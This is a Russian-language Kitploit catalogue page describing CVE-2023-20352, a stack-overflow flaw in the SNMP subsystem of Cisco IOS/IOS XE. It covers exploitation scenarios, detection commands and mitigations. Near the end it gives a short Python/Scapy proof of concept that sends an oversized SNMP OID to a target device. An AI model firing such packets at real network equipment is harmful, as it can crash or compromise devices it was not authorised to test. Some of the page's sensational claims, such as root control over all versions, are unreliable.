Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SNMPocalypse-Cisco-Bug-Lets-Hackers-Crash-or-Command-Devices — CVE-2023-20352 — критическая ошибка переполнения стека в SNMP-движке Cisco IOS/IOS XE. С помощью всего лишь специально сформированных SNMP-пакетов удалённые злоумышленники могут обрушить системы или захватить root-контроль. Уязвимы все версии SNMP — установите исправление сейчас или рискуйте полной компрометацией. | Kitploit
Инструменты/GitHubGitHub/mrk336/snmpocalypse-cisco-bug-lets-hackers-crash-or-command-devices
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubmrk336/snmpocalypse-cisco-bug-lets-hackers-crash-or-command-devices

SNMPocalypse-Cisco-Bug-Lets-Hackers-Crash-or-Command-Devices

Репозиторий
411 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE-2023-20352 — критическая ошибка переполнения стека в SNMP-движке Cisco IOS/IOS XE. С помощью всего лишь специально сформированных SNMP-пакетов удалённые злоумышленники могут обрушить системы или захватить root-контроль. Уязвимы все версии SNMP — установите исправление сейчас или рискуйте полной компрометацией.

Поделиться

SNMPocalypse: ошибка Cisco позволяет хакерам выводить устройства из строя или получать над ними контроль

CVE-2023-20352 — это критическая уязвимость переполнения стека в движке SNMP Cisco IOS/IOS XE. С помощью всего лишь специально сформированных SNMP-пакетов удалённые злоумышленники могут обрушить системы или получить root-контроль. Уязвимы все версии SNMP — патчите сейчас или рискуйте полной компрометацией.

Автор: Mark Malllia

Введение в SNMP

Простой протокол управления сетью (SNMP) — это базовый протокол в администрировании сетей, позволяющий системным администраторам отслеживать, настраивать и управлять сетевыми устройствами. Он работает на портах 161 (для SNMP-запросов) и 162 (для ловушек). SNMP поддерживает три версии: v1, v2c и v3, каждая из которых обеспечивает разный уровень безопасности. Эта тема мне особенно близка: моя диссертация была посвящена SNMP, а Cisco остаётся неотъемлемой частью моей повседневной работы.

Возможности SNMP распространяются на мониторинг в реальном времени, управление инвентаризацией и обнаружение неисправностей в сетях. Несмотря на свою важность, роль SNMP в управлении сетями также создаёт риски безопасности при недостаточной защите, как видно на примере уязвимости CVE-2023-20352.

Что пошло не так: объяснение CVE-2023-20352

CVE-2023-20352 — это уязвимость высокого уровня серьёзности, связанная с переполнением буфера в стеке, которая затрагивает устройства Cisco IOS и IOS XE. Она находится в подсистеме SNMP, обрабатывающей сетевой управляющий трафик.

Технические детали:

  • переполнение буфера в стеке (CWE-121)
Тип уязвимости:
  • Оценка CVSS: 7.7 (высокая)
  • Воздействие: возможный отказ в обслуживании (DoS) или удалённое выполнение кода (RCE)
  • Уязвимость активируется при отправке специально сформированных SNMP-пакетов на уязвимое устройство, что приводит к некорректной проверке границ и переполнению стека. Затронуты все версии SNMP.

    Сценарии эксплуатации

    1. Атака с низкими привилегиями:

      • Требуемый доступ: community-строка SNMPv2c с правами только для чтения или учётные данные SNMPv3.
      • Воздействие: перезагрузка устройства (DoS).
    2. Атака с высокими привилегиями:

      • Требуемый доступ: community-строка SNMPv1/v2c с учётными данными уровня привилегий 15.
      • Воздействие: полное удалённое выполнение кода (RCE) с правами root.

    Обнаружение и проверка

    Для обнаружения уязвимостей администраторы могут использовать следующие команды CLI:

    root@kitploit:~
    show running-config | include snmp-server community
    show running-config | include snmp-server group
    show snmp
    

    Как защититься: меры по смягчению рисков

    • Установка обновлений: Cisco выпустила обновления прошивки для затронутых платформ.
    • Ограничение доступа к SNMP: ограничьте доступ доверенными IP-адресами, если вы этого ещё не сделали.
    • Отключение уязвимых OID: используйте команды вида snmp-server view <view-name> <OID> excluded.

    Как злоумышленники могут использовать эту уязвимость

    Концептуальный PoC с использованием Python и Scapy демонстрирует возможность эксплуатации:

    root@kitploit:~
    from scapy.all import *
    
    # Replace with target IP and SNMP community string
    target_ip = "192.168.1.1"
    community = "public"
    
    # Craft malicious packet
    payload = b"A" * 1024  # Overflow buffer
    packet = IP(dst=target_ip)/UDP(dport=161)/SNMP(community=community, PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)]))
    
    send(packet)
    

    Примечание: это упрощённый пример. Реальная эксплуатация требует точного формирования полезной нагрузки и повышения привилегий.

    Заключение

    Уязвимость CVE-2023-20352 подчёркивает критическую роль SNMP и связанные с ней риски. Организации должны уделять первоочередное внимание обновлению и защите конфигураций SNMP для снижения угроз и обеспечения устойчивости сети к новым атакам.

    Скачать инструмент